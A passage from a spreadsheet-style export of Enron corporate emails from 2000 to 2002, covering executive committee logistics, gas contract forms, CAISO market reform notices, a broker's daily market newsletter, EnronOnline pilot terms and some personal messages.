Mary E Garza/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Maureen _x000D_
McVicker/NA/Enron@Enron, Joannie Williamson/Corp/Enron@ENRON, Rosalee _x000D_
Fleming/Corp/Enron@ENRON, Vanessa Groscrand/Corp/Enron@ENRON, Tori L _x000D_
Wells/HOU/ECT@ECT, Cathy Phillips/HOU/ECT@ECT, Loretta _x000D_
Brelsford/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Sue Ford/HOU/ECT@ECT, Dolores _x000D_
Fisher/NA/Enron@Enron, Karen Owens/HOU/EES@EES, Dorothy Dalton/Enron _x000D_
Communications@Enron Communications, Mercedes Estrada/Enron _x000D_
Communications@Enron Communications, Christina Grow/Corp/Enron@ENRON, Lauren _x000D_
Urquhart/LON/ECT@ECT, Sherri Sera/Corp/Enron@ENRON, Katherine _x000D_
Brown/Corp/Enron@ENRON, Liz M Taylor/HOU/ECT@ECT, Judy G Smith/HOU/EES@EES, _x000D_
Bobbie Power/Corp/Enron@ENRON, Suzanne Danz/Corp/Enron@ENRON, Peggy _x000D_
McCurley/HOU/ECT@ECT, Marsha Schiller/HOU/ECT@ECT, Fiona Stewart/LON/ECT@ECT, _x000D_
Jana L Paxton/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Connie _x000D_
Blackwood/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Tammie Schoppe/HOU/ECT@ECT, _x000D_
Kimberly Hillis/HOU/ECT@ect, Jennifer Burns/HOU/ECT@ECT, Sharon _x000D_
Dick/HOU/EES@EES, Beverly Aden/HOU/EES@EES, Kathy Dodgen/HOU/EES@EES, Kerry _x000D_
Ferrari/LON/ECT@ECT, Carol Moffett/HOU/EES@EES, Jennifer Adams/Enron _x000D_
Communications@Enron Communications, Leah Rijo/Enron Communications@Enron _x000D_
Communications, Lucy Marshall/Enron Communications@Enron Communications, _x000D_
Kathy Campos/GPGFIN/Enron@ENRON, Julie Armstrong/Corp/Enron@ENRON, Kathryn _x000D_
Greer/HOU/EES@EES_x000D_
cc:  _x000D_
Subject: Executive Committee Residential Addresses_x000D_
_x000D_
As promised, below is a list of home addresses for the Executive Committee _x000D_
(as attached is a list of spouses names). Please do not share this list with _x000D_
anyone not on the Executive Committtee.  _x000D_
Thank you, _x000D_
Katherine_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 19 Jun 2001 09:05:44 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'kford1@txu.com'})</t>
  </si>
  <si>
    <t>Inter/Intra GISB for Enron North America</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
I forwarded these contract forms to you on May 25 for your review. Do I need to_x000D_
resend them?_x000D_
_x000D_
Keith Ford_x000D_
TXU Fuel Company_x000D_
Contract Administration Supervisor_x000D_
_x000D_
---------------------- Forwarded by Keith Ford/BIZSRV/TXU on 06/19/2001 11:04 AM_x000D_
---------------------------_x000D_
_x000D_
_x000D_
Lynn Handlin_x000D_
06/18/2001 10:19 AM_x000D_
_x000D_
To:   DFARMER@enron.com, Keith Ford/BIZSRV/TXU@TU_x000D_
cc:_x000D_
Subject:  Inter/Intra GISB for Enron North America_x000D_
_x000D_
Please forward an Inter/Intra GISB ASAP to Enron North America or whatever name_x000D_
they want to use for their new contracts._x000D_
_x000D_
Darren - please note that we do not take any changes to the GISB's that Keith_x000D_
will be forwarding._x000D_
_x000D_
Darren's email is      dfarmer@enron.com_x000D_
_x000D_
Thanks for your help!    Let me know the number as soon as possibe - so I can_x000D_
update our records._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 19 Oct 2001 07:15:09 -0700 (PDT)</t>
  </si>
  <si>
    <t>FW: 2002 Plan Lay Presentation Run Through</t>
  </si>
  <si>
    <t xml:space="preserve">fyi_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Geaccone, Tracy  _x000D_
Sent:	Thursday, October 18, 2001 11:07 AM_x000D_
To:	McCarty, Danny; Cordes, Bill; Stanley, Brian; FOWLER, PEGGY; Garrison, John L; Hughes, James A.; Umanoff, Adam_x000D_
Cc:	Anderson, Michael; Sommers, Jeffrey E.; Peters, Jerry; Copeland, Erin; Dodson, Keith; Piro, Jim; Lindholm, Tod A.; Armstrong, Julie; Stark, Cindy; Hayslett, Rod; Stark, Cindy_x000D_
Subject:	2002 Plan Lay Presentation Run Through _x000D_
_x000D_
Stan would like to have a run through of the presentation for the Lay reviews on November 1.  Please see the agenda attached below for your respective group's time.  We will be meeting in EB 49C2.  If you need to call in, the number is below._x000D_
If you can not attend, please send a representative.  _x000D_
_x000D_
_x000D_
 _x000D_
CALL IN:_x000D_
PARTICIPANT CODE:  277217_x000D_
  *  Toll Free Dial In Number:  (800)403-2002_x000D_
_x000D_
If you are calling in, please send your presentation to me ahead of time so I can make copies.   _x000D_
_x000D_
Please feel free to invite anyone else you want to attend.  If you have any questions, I can be reached at 713-853-7372._x000D_
_x000D_
Thanks_x000D_
_x000D_
Tracy          _x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 11 Jul 2000 10:53:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>CAISO Notice - Congestion Management Reform Proposal Posting</t>
  </si>
  <si>
    <t xml:space="preserve">  Market Participants:_x000D_
  The CAISO has posted its draft Congestion Management Reform_x000D_
(CMR) recommendation on its web site at_x000D_
http://www.caiso.com/clientserv/congestionreform.html_x000D_
&lt;http://www.caiso.com/clientserv/congestionreform.html&gt; . This document_x000D_
recommends changes to the CAISO's current Congestion Management process and_x000D_
related features of its business practices and operations. This is a draft_x000D_
document, albeit one that we believe reflects significant effort and thought_x000D_
on the part of both the stakeholders who provided the initial input and the_x000D_
interdisciplinary design team that drafted this document._x000D_
  This CMR recommendation represents an essential milestone in_x000D_
the broader Congestion Management Reform Project.  The first stage involved_x000D_
soliciting stakeholder input regarding the problems to be solved,_x000D_
alternative solutions to address these problems, and criteria for evaluating_x000D_
reform proposals. The second stage involved the CAISO's crafting an_x000D_
integrated, internally consistent reform package utilizing the ideas_x000D_
developed with and/or by Stakeholders in stage one. This document contains_x000D_
the CAISO's draft recommendation. We emphasize that, although we believe_x000D_
this recommendation package to be a necessary milestone in the Congestion_x000D_
Management Reform Project, it is not intended to predispose the final_x000D_
design. We are actively soliciting Stakeholders' comments and critiques_x000D_
concerning this recommendation over the coming weeks (stage three of the CMR_x000D_
project)._x000D_
  Once the next round of stakeholder input has been assessed,_x000D_
the CAISO will revise this CMR recommendation. The revised recommendation_x000D_
will be presented to the CAISO Governing Board for discussion and review_x000D_
only on August 1 (no Board action requested). The CMR recommendation will_x000D_
continue to be developed through August and the final recommendation will be_x000D_
submitted to the CAISO Governing Board for approval at the September 6th and_x000D_
7th meeting.  The approved CMR recommendation will be prepared (in_x000D_
conjunction with Stakeholders) for the final Tariff filing to FERC in_x000D_
November (stage four). A revised, detailed calendar will be presented at the_x000D_
CMR Stakeholder meetings on July 13 and 14._x000D_
  At the July 13 and 14 Stakeholder meetings, the CAISO will_x000D_
present the entire recommendation, section-by-section and provide the_x000D_
opportunity for Stakeholders to clarify their understanding of what is being_x000D_
proposed. Shortly thereafter, we will hold additional Stakeholder meetings_x000D_
to facilitate detailed discussion of individual elements of the_x000D_
recommendation. Additional meeting dates will be discussed on July 14 at the_x000D_
meeting._x000D_
  We look forward to reviewing this proposal with you and_x000D_
receiving your comments. The CAISO welcomes any and all comments and_x000D_
critiques of this recommendation. We appreciate your attention and efforts_x000D_
in this endeavor to reform the Congestion Management process._x000D_
  Byron Woertz_x000D_
  Director, Client Relations</t>
  </si>
  <si>
    <t>Tue, 27 Nov 2001 07:18:56 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'m..love@enron.com', 'bjorn.hagelmann@enron.com', 'james.new@enron.com', 'tammie.schoppe@enron.com', 'kimberly.hillis@enron.com', 'sally.beck@enron.com', 'c..gossett@enron.com', 'cassi.wallace@enron.com', 'david.baumbach@enron.com', 'loretta.brooks@enron.com', 'm.hall@enron.com', 'rick.buy@enron.com', 'william.kelly@enron.com', 'mark.frevert@enron.com', 'a..price@enron.com', 'cassandra.schultz@enron.com', 'frank.hayden@enron.com', 'shona.wilson@enron.com', 'louise.kitchen@enron.com', 'ted.murphy@enron.com', 'john.allison@enron.com', 'mike.jordan@enron.com', 'd..winfree@enron.com', 'beth.apollo@enron.com', 'chris.abel@enron.com', 'mike.mcconnell@enron.com', 'todd.hall@enron.com', 'errol.mclaughlin@enron.com', 'david.patton@enron.com', 'david.port@enron.com', 'john.sherriff@enron.com', 'kam.keiser@enron.com', 'michael.kass@enron.com', 'john.lavorato@enron.com', 'greg.whalley@enron.com', 'anne.bike@enron.com', 'kenneth.lay@enron.com'})</t>
  </si>
  <si>
    <t>11/26/01 PRELIMINARY Violation Memos</t>
  </si>
  <si>
    <t xml:space="preserve">The PRELIMINARY Violation Memos for 11/26/01 have been published and are available for viewing on the ERV:  http:\\erv.corp.enron.com - Violation/Notification memo Section._x000D_
</t>
  </si>
  <si>
    <t>Fri, 10 May 2002 16:01:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>FW: Surprise 30th Bday Party for Meredith</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	"James S. Homco" &lt;jhomco@minutemaid.com&gt;@ENRON  _x000D_
Sent:	Friday, May 10, 2002 3:01 PM_x000D_
To:	Germany, Chris_x000D_
Subject:	Surprise 30th Bday Party for Meredith_x000D_
_x000D_
_x000D_
----- Forwarded by James S. Homco/MM/NA/TCCC on 05/10/02 03:00 PM -----_x000D_
_x000D_
                    James S. Homco_x000D_
                                         To:     slboudreaux@duke.com, beverly.b.beaty@williams.com,_x000D_
                    05/10/02 02:58        t.carter@sequent.com, tricia.spence@aquilla.com,_x000D_
                    PM                    victor.lamadrid@ubswenergy.com, robert.allwein@ubswenergy.com,_x000D_
                                          mark.l.schrab@ubswenergy.com, scott.goodell@ubswenergy.com,_x000D_
                                          suzanne.calcagno@ubswenergy.com, James S. Homco/MM/NA/TCCC@TCCC,_x000D_
                                          jzurita@houston.rr.com, katherine.l.kelly@enron.com,_x000D_
                                          d.anderson@houstonexp.com, k.boutgieos@totalfinaelf.com,_x000D_
                                          bosoria@reliant.com_x000D_
                                         cc:_x000D_
                                         Subject:     Surprise 30th Bday Party for Meredith_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Hey everyone - I am in the process of finalizing a SURPRISE 30th birthday_x000D_
PARTY for my lovely wife, Meredith._x000D_
I will get the final info out next week...but just wanted to drop you all a_x000D_
note so that you could pencil it in your calendars._x000D_
_x000D_
When:  Friday May 31st   8:00ish_x000D_
Where:  Spotlight Karaoke - Westheimer @ Fountainview_x000D_
       (we will have a private room - with our own DJ -  holding up to 50_x000D_
people, so you will be able to sing_x000D_
               on the small stage or on the big stage in the main bar)._x000D_
_x000D_
Please feel free to pass the word around, everyones invited ... but_x000D_
hopefully we can keep it a surprise for Meredith._x000D_
More details next week._x000D_
_x000D_
Thanks, Jim._x000D_
713-888-5119_x000D_
jhomco@minutemaid.com_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 15 Dec 2000 04:21:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'joy.werner@enron.com'})</t>
  </si>
  <si>
    <t>Texas New Mexico</t>
  </si>
  <si>
    <t>Deal 457758.1 for 11/14/00, HE 7 shows 25mw @ $175, TNP shows $150, the El _x000D_
Paso model shows $150. _x000D_
I believe tehy are correct. Can you please tell me who is right and if they _x000D_
are, please change this?_x000D_
Thank you_x000D_
Joy</t>
  </si>
  <si>
    <t>Tue, 4 Jan 2000 07:51:00 -0800 (PST)</t>
  </si>
  <si>
    <t>ENA/EDEN transaction</t>
  </si>
  <si>
    <t xml:space="preserve">Happy New Year, and, did we ever do a back-to-back (RMT/Enron _x000D_
Comercializadora Argentina) deal for this transaction?  </t>
  </si>
  <si>
    <t>Mon, 27 Aug 2001 16:25:20 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'louise.kitchen@enron.com', 'rahil.jafry@enron.com'})</t>
  </si>
  <si>
    <t>New look and tour for EnronOnline</t>
  </si>
  <si>
    <t xml:space="preserve">Louise/Rahil -- I wanted to ask your artistic opinion on this agency's site.  I am thinking about hiring them to update the look and feel and tour for EnronOnline.  They have done some very interesting things with movements within photographs, 3-D, layers and typography.  I'll work through the proper approval channels (Greg Piper, Jay Webb and Brad) before doing anything, but I just wanted your artistic opinion.      _x000D_
_x000D_
http://2advanced.com/flashindex.htm_x000D_
_x000D_
Kal_x000D_
			</t>
  </si>
  <si>
    <t>Tue, 10 Apr 2001 05:17:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'dee.madole@enron.com'})</t>
  </si>
  <si>
    <t>California Power Markets</t>
  </si>
  <si>
    <t>---------------------- Forwarded by Steven J Kean/NA/Enron on 04/10/2001 _x000D_
12:17 PM ---------------------------_x000D_
_x000D_
_x000D_
Suzanne_Nimocks@mckinsey.com@mckinsey.com on 03/02/2001 12:04:50 PM_x000D_
Sent by: Carol_Benter@mckinsey.com_x000D_
To: skean@enron.com_x000D_
cc:  _x000D_
_x000D_
Subject: California Power Markets_x000D_
_x000D_
_x000D_
Sorry that we haven't talked in some time.  I thought that you would want_x000D_
to take a look at some analysis we have recently completed with regard to_x000D_
the California Power Crisis.  You may find some of the analysis to be_x000D_
helpful.  Let me know if you have any questions._x000D_
_x000D_
(See attached file: 10209 zxd414.ppt)_x000D_
_x000D_
+-------------------------------------------------------------+_x000D_
| This message may contain confidential and/or privileged     |_x000D_
| information.  If you are not the addressee or authorized to |_x000D_
| receive this for the addressee, you must not use, copy,     |_x000D_
| disclose or take any action based on this message or any    |_x000D_
| information herein.  If you have received this message in   |_x000D_
| error, please advise the sender immediately by reply e-mail |_x000D_
| and delete this message.  Thank you for your cooperation.   |_x000D_
+-------------------------------------------------------------+_x000D_
 - 10209 zxd414.ppt</t>
  </si>
  <si>
    <t>Thu, 7 Jun 2001 11:20:29 -0700 (PDT)</t>
  </si>
  <si>
    <t xml:space="preserve">Hi Christie,_x000D_
_x000D_
Thanks. He is graduating on June 16._x000D_
By the way, did you see some of the movies I recommended_x000D_
to you?_x000D_
_x000D_
Vince_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Patrick, Christie  _x000D_
Sent:	Thursday, June 07, 2001 9:35 AM_x000D_
To:	Kaminski, Vince J_x000D_
Subject:	FW: Resume_x000D_
_x000D_
_x000D_
_x000D_
Thanks Vince!   I'm out of town but will check with Mark._x000D_
_x000D_
Hope all is well with you!  Did your son graduate?  _x000D_
_x000D_
Take care!_x000D_
_x000D_
--Best!_x000D_
_x000D_
--Christie._x000D_
---------------------- Forwarded by Christie Patrick/HOU/ECT on 06/07/2001 09:30 AM ---------------------------_x000D_
From:	Vince J Kaminski/ENRON@enronXgate on 06/06/2001 08:00 AM_x000D_
To:	Christie Patrick/HOU/ECT@ECT_x000D_
cc:	 _x000D_
_x000D_
Subject:	FW: Resume_x000D_
_x000D_
_x000D_
Christie,_x000D_
_x000D_
I sent this resume to Mark Palmer._x000D_
Any other thoughts where he might fit?_x000D_
He is a very good friend of mine._x000D_
_x000D_
Vince_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	VKaminski@aol.com@ENRON [mailto:IMCEANOTES-VKaminski+40aol+2Ecom+40ENRON@ENRON.com] _x000D_
Sent:	Tuesday, June 05, 2001 9:49 PM_x000D_
To:	vkamins@enron.com_x000D_
Subject:	Resume_x000D_
_x000D_
_x000D_
_x000D_
 - Mar Comm Dir 2001.doc &lt;&lt; File: Mar Comm Dir 2001.doc &gt;&gt; _x000D_
</t>
  </si>
  <si>
    <t>Thu, 6 Jul 2000 00:39:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>7/6/00</t>
  </si>
  <si>
    <t>Salomon makes a negative call on chips; ENTU (Entrust Technologies) CA*_x000D_
(Computer Associates) and BMCS* (BMC Software) miss big and oh yes lets not_x000D_
forget the post-holiday reverberations of ORCL's (Oracle) # 2 man stepping_x000D_
down - it wasn't pretty in tech. Is it any wonder the Nasdaq was never in_x000D_
the green and closed down over 125? In listed-land it was Saudi Arabia_x000D_
threatening to sink oil prices vs. some buoyancy in the financials and drugs_x000D_
- and the bears won with the Dow Industrials closing down 77. In tech - ENTU_x000D_
down over 50%, ORCL down almost 9%, AMAT (Applied Materials) AMD (Advanced_x000D_
Micro Devices) NSM (National Semiconductor) down 10% or more, VTSS (Vitesse_x000D_
Semiconductor) MU (Micron Technologies) TXN (Texas Instruments) down over_x000D_
6%, LU* (Lucent Technologies) CSCO (Cisco Systems) SUNW (Sun Microsystems)_x000D_
GE (General Electric) YHOO (Yahoo) all down over 4%, RHAT (Red Hat Inc) down_x000D_
7% - a couple of bright spots (but only a couple) AOL (America Online) up_x000D_
over 2 1/2% and T (AT&amp;T) up over 3%. The oils and the drillers were a drag -_x000D_
BPA (BP Amoco PLC) and APA (Apache Corp) down 7%, TX (Texaco Inc) CHV_x000D_
(Chevron Corp) and SLB (Schlumberger Inc) down over 4%, XOM (Exxon Mobile)_x000D_
down 3%, BHI (Baker Hughes Inc.) down 6% meanwhile IMNX (Immunex Corp) BGEN_x000D_
(Biogen) LLY (Ely Lilly) all up 4%, AMG (Affliated Mangers Group) up 7%, BMY_x000D_
(Bristol Myers Squibb) up 2% and the financials - WFC (Wells Fargo) GS_x000D_
(Goldman Sachs Group) C (Citigroup) all up 1%, MER (Merrill Lynch) MWD (MS_x000D_
Dean Witter) ONE (Bank One Corp) ALL (Allstate Corp) all up 2%.... In the_x000D_
CEUT Universe the stories of the day were BMCS* and CA* - both down 40%_x000D_
after negative pre-announcements - CA* announced first and Paul Rodriguez_x000D_
attributed the miss to three factors - Europe, mainframe slowness and not_x000D_
closing two deals; BMCS* followed - the street did not react positively to_x000D_
their morning call. Karl Motey's space was hit due to the Saloman call -_x000D_
PMCS* (PMC Sierra Corp) KOPN+ (Kopin) down 8, TLCM* (Telecom Semiconductors)_x000D_
PSEM* (Pericom Semiconductors) down 9, SSTI* (Silicon Storage) down almost_x000D_
15... JDSU (JDS Uniphase) down over 9... IMAN (Imanage Inc) down 8%...._x000D_
PROX* (Proxim) down over 5... VRTS* (Veritas Software) down over 4 1/2,_x000D_
MUSE* (Micromuse) up over 3 1/2.... SPOT* (Panam Sat) down over 2.... JBL*_x000D_
(Jabil Circuit) down over 2.... COVD* (Covad) up over 1.... after the close_x000D_
RDCM+ (Radcom) pre-announced negatively._x000D_
_x000D_
FBI questioning Japan's NTT purchase of US ISP Verio - security concerns -_x000D_
how can we bug?_x000D_
_x000D_
Datek - taking limit orders in decimals._x000D_
_x000D_
Lernout and Hauspie - down 16% - questions about concentration of revenues._x000D_
_x000D_
AmericasMart.com - retailer of furnishings - UPS offering credit cards and_x000D_
unsecured lines of credit to customers._x000D_
_x000D_
AOL - stake in SpeechWorks - maker of voice recong. software - phone access_x000D_
to net becoming more vital._x000D_
_x000D_
Edgewater Tech - formally StaffMark - dumping temp staff business to be_x000D_
e-commerce consulting firm._x000D_
_x000D_
Alcatel - buys private maker of optical components (Innovative Fibers of_x000D_
Canada)._x000D_
_x000D_
Ionics EMS - $1Billion disk drive order from Philips._x000D_
_x000D_
Sanyo - mobile phone/audio player (developed by consortium featuring Fujitsu_x000D_
and Hitachi)._x000D_
_x000D_
Comverse Tech. - buys Israeli wireless infrast. firm Exalink._x000D_
_x000D_
Carrefour (huge French retailer) and BNP-Paribas - online financial services_x000D_
via retailers web portal._x000D_
_x000D_
Cable and Wireless - $30 million to Euro net incubator Gorilla Park._x000D_
_x000D_
Swissair - CEO quits for net start-up._x000D_
_x000D_
Brit T - aggressive WAP ad push - not paying off - consumers aren't buying._x000D_
_x000D_
Japan's NEC - planning NYSE listing._x000D_
_x000D_
WSJ - overview of sites targeting Latin American women._x000D_
_x000D_
NY Times - online phone calls catching on._x000D_
_x000D_
Waterpark in Denver - kids wear electronic wristwatch tracking device so_x000D_
parents can locate them at all times._x000D_
_x000D_
Buy.com , Staples and eZimba - victims of electronic fraud - hackers use_x000D_
gift certificates to get free merchandise._x000D_
_x000D_
Hotwire.com - coming in Sept. - discounted last minute empty airline seats -_x000D_
watch out Priceline (not to be confused with airline backed Orbitz site)._x000D_
_x000D_
iFilm - layoffs._x000D_
_x000D_
3i Networks - Java based ap service provider - for e-commerce - $1 million_x000D_
first round._x000D_
_x000D_
Dept. of Agriculture - have invented Plumcots - cross between apricot and_x000D_
plum._x000D_
_x000D_
petersons.com/private/ - site for info on private schools._x000D_
_x000D_
Mossberg of WSJ - review of Omnisky "wireless web" - has potential but not_x000D_
really here yet._x000D_
_x000D_
Global Quest Network - hear 15 second ad - place call for free -available in_x000D_
Dallas/Ft. Worth._x000D_
_x000D_
Dell - drops NextMonet.com (art sales site) from intranet - doesn't like_x000D_
nude pictures._x000D_
_x000D_
INTC - settles patent suit vs. Via Tech._x000D_
_x000D_
HWP - 5% sake in Novadigm - intergrate their management soft. into HWP's_x000D_
solution._x000D_
_x000D_
WorldSpy.com - free ISP - goes under._x000D_
_x000D_
Norway's Opera Soft. - develops browser for Psion's OS._x000D_
_x000D_
DSTM - profit warning._x000D_
_x000D_
Ibidlive - auctioning .tv domain names on web and TV._x000D_
_x000D_
WSJ Heard - analysis of CA debacle._x000D_
_x000D_
alteregonet.com - soft. to unify format of wireless content without regard_x000D_
to device._x000D_
_x000D_
BMET - 3 for 2._x000D_
_x000D_
onlineconservatory.com - musicians can jam with their friends online._x000D_
_x000D_
CIBC - intiates RIMM* with a buy. (trading up in pre-market)._x000D_
_x000D_
Orange - buys Brit. news site Ananova (and animated news anchor)_x000D_
_x000D_
European Parl. - angry about American eavesdropping - say it's for corporate_x000D_
espionage._x000D_
_x000D_
C.E. Unterberg Towbin's Paul Rodriguez - on CNN yesterday commenting on his_x000D_
space._x000D_
_x000D_
C.E. Unterberg Towbin - INIT marketing in NY._x000D_
_x000D_
The information contained herein is obtained from sources we believe to be_x000D_
reliable but its accuracy and completeness, and that of the opinions based_x000D_
thereon, are not guaranteed. C.E. Unterberg Towbin, or one or more of its_x000D_
partners, may have a position in any of the securities discussed herein. All_x000D_
rights reserved by C.E. Unterberg Towbin. May not be reproduced in whole or_x000D_
in part without prior written authorization. This report is not an offer to_x000D_
sell or solicitation of an offer to buy the securities mentioned herein._x000D_
*C.E. Unterberg Towbin makes a market in this security and/or has analyst_x000D_
coverage._x000D_
+C.E. Unterberg Towbin makes a market in this security and has been involved_x000D_
in a recent financing._x000D_
______________________________x000D_
Bram Towbin_x000D_
C.E. Unterberg Towbin_x000D_
10 East 50th Street_x000D_
New York NY 10022_x000D_
_x000D_
Telephone: 212 572 8163_x000D_
Fax: 212 759 4032_x000D_
Btowbin@unterberg.com_x000D_
www.unterberg.com_x000D_
_x000D_
_x000D_
----------------------------------------------------------------_x000D_
Pursuant to SEC and NASD requirements, all incoming and outgoing e-mail of _x000D_
C.E. Unterberg, Towbin is subject to review by the Compliance Department._x000D_
_x000D_
Please note that C.E. Unterberg, Towbin does not allow the use of e-mail to _x000D_
request, authorize or  effect the purchase or sale of any security, to send _x000D_
fund transfer instructions, or to effect any other transactions.  Any such _x000D_
request, orders or instructions that you send will not be accepted and will _x000D_
not be processed._x000D_
_x000D_
================================================================</t>
  </si>
  <si>
    <t>Thu, 24 Jan 2002 21:30:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'jami.horton@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'pat.vaughan@enron.com', 'dean.hallowell@enron.com', 'larry.craddock@enron.com', 'mike.pavey@enron.com', 'team.eunice@enron.com', 'ruthann.frausto@enron.com', 'jim.mcclain@enron.com', 'lois.taylor@enron.com', 'team.oakland@enron.com', 'max.brown@enron.com', 'tony.moore@enron.com', 'judy.northcutt@enron.com', 'danny.hostetler@enron.com', 'john.gormley@enron.com', 'jacob.shupe@enron.com', 'wally.snyder@enron.com', 'gloria.wier@enron.com', 'ronny.davenport@enron.com', 'ed.lawrence@enron.com', 'dennis.lee@enron.com', 'gina.taylor@enron.com', 'james.muhlbauer@enron.com', 'walt.williams@enron.com', 'bill.brothers@enron.com', 'robert.benningfield@enron.com', 'jeff.cullison@enron.com', 'don.hawkins@enron.com', 'rebecca.marks@enron.com', 'marian.salinas@enron.com', 'craig.mack@enron.com', 'dick.heitman@enron.com', 'marlane.nollner@enron.com', 'rich.jolly@enron.com', 'le.phan@enron.com', 'jane.scelzo@enron.com', 'jodie.floyd@enron.com', 'mike.fuentes@enron.com', 'debra.young@enron.com', 'team.south-omaha@enron.com', 'team.garner@enron.com', 'bob.hagen@enron.com', 'team.cunningham@enron.com', 'gary.maestas@enron.com', 'jon.wernette@enron.com', 'joey.woolley@enron.com', 'bruce.orluck@enron.com', 'chris.mortimer@enron.com', 'l..johnson@enron.com', 'wade.collins@enron.com', 'randy.lebeau@enron.com', 'karen.hulscher@enron.com', 'team.redfield@enron.com', 'jami.horton@enron.com', 'kathy.willard@enron.com', 's..smith@enron.com', 'melinda.gallishaw@enron.com', 'kim.ladish@enron.com', 'leo.fajardo@enron.com', 'dan.maschka@enron.com', 'sally.hsieh@enron.com', 'sarah.haden@enron.com', 'lynn.irvin@enron.com', 'neta.zitnik@enron.com', 'c..harris@enron.com', 'team.clifton@enron.com', 'margaret.hall@enron.com', 'theresa.kyler@enron.com', 'todd.ingalls@enron.com', 'renee.pena@enron.com', 'richard.troyer@enron.com', 'ron.sole@enron.com', 'steve.tarter@enron.com', 'dave.odneal@enron.com', 'kelly.lewis@enron.com', 'kay.woods@enron.com', 'cliff.mcpherson@enron.com', 'larry.bertholf@enron.com', 'kenneth.poole@enron.com', 'frank.sosa@enron.com', 'ivan.hamilton@enron.com', 'mike.murphy@enron.com', 'tony.teakell@enron.com', 'gil.schutza@enron.com'})</t>
  </si>
  <si>
    <t>What's New on Pipeline Safety Web Site</t>
  </si>
  <si>
    <t>Please check out the following new posted document(s) on Pipeline Safety =_x000D_
Web Site. Thanks for using Pipeline Safety Web Site!_x000D_
(Please click the link to view the entire document)_x000D_
_x000D_
1. Welding Index  ( =_x000D_
http://www.ets.enron.com/PipelineSafety/psEngStds/8300.doc )</t>
  </si>
  <si>
    <t>Wed, 29 Nov 2000 09:18:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'jeff.dasovich@enron.com', 'burkee@cts.com'})</t>
  </si>
  <si>
    <t>Re: PD in Gas OIR</t>
  </si>
  <si>
    <t>Mike Day asked me to update my PG&amp;E city-gate comparison to show, contrary_x000D_
to the PD in the Gas OIR, that recent months have not called into question_x000D_
the benefits of the PG&amp;E city-gate market.  Attached is a figure with NGI_x000D_
data from May through November for the PG&amp;E city-gate and for Topock plus_x000D_
Baja transport.  The city-gate is higher than Topock plus Baja only in_x000D_
October, when the city-gate did not drop as quickly as Topock did in the_x000D_
aftermath of the El Paso explosion.  I did not include the Malin plus_x000D_
Redwood comparison, which has been consistently below the city-gate this_x000D_
summer (Malin prices were consistently and significantly lower than Topock_x000D_
this summer).  However, little Redwood capacity is available, so I would_x000D_
argue that Malin plus Redwood is not an option for most end users._x000D_
_x000D_
Tom Beach_x000D_
_x000D_
 - PG&amp;E Citygate Comparison Nov00.xls</t>
  </si>
  <si>
    <t>Wed, 23 Jan 2002 10:08:42 -0800 (PST)</t>
  </si>
  <si>
    <t>FW: Research Library</t>
  </si>
  <si>
    <t>_x000D_
_x000D_
-----Original Message-----_x000D_
From: Kaminski, Vince J _x000D_
Sent: Wednesday, January 23, 2002 12:08 PM_x000D_
To: Fallon, Jim; Kitchen, Louise_x000D_
Cc: Webb, Jay_x000D_
Subject: RE: Research Library_x000D_
_x000D_
_x000D_
Please, keep in mind, that the members of the Research Group_x000D_
who stayed behind to facilitate the transition will be leaving _x000D_
for good, in a week. We have to accelerate the process._x000D_
_x000D_
Vince_x000D_
_x000D_
_x000D_
-----Original Message-----_x000D_
From: Fallon, Jim _x000D_
Sent: Thursday, January 17, 2002 6:54 PM_x000D_
To: Kitchen, Louise_x000D_
Cc: Kaminski, Vince J; Webb, Jay_x000D_
Subject: Re: Research Library_x000D_
_x000D_
_x000D_
Does the state have copies of all programs?  Should systems manage the migration?  Muller was going to send vince the copy of the contract indicating the section to vince that required the turnover just to make sure we were doing the right thing - did that happen?_x000D_
--------------------------_x000D_
Sent from my BlackBerry Wireless Handheld (www.BlackBerry.net)</t>
  </si>
  <si>
    <t>Mon, 21 Aug 2000 07:20:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>EnronOnline Pilot Program</t>
  </si>
  <si>
    <t xml:space="preserve">We have finalized the terms of the EnronOnline direct connect pilot program.  _x000D_
The following points outline the primary terms of the program.  Subject to _x000D_
your review we will begin implementation of the program pursuant to these _x000D_
terms.  Please review the terms and let me know if you have any questions or _x000D_
comments._x000D_
_x000D_
Direct Connect service will include the provisioning of T1 connections _x000D_
between Enron counterparties and various Enron PoP's.  EnronOnline specific _x000D_
traffic will be transported to these Enron Pop's via the Enron Intelligent _x000D_
Network._x000D_
EBS will implement and manage the direct connect service on behalf of _x000D_
EnronOnline.  All customer support relative to the direct connect service _x000D_
will be managed by EBS._x000D_
In the event of a failure of the direct connect service, the user will access _x000D_
EnronOnline via an Internet connection._x000D_
The pilot program will last for an initial term of 12 months._x000D_
EnronOnline will pay $1750 per month for installation and monthly charges for _x000D_
the local loop, all backbone and/or internetworking charges and ongoing _x000D_
support for any North American client that comprises at least 1% of all _x000D_
EnronOnline transactions (see attached list of eligible counterparties)._x000D_
Any EnronOnline customer that does not comprise at least 1% of the _x000D_
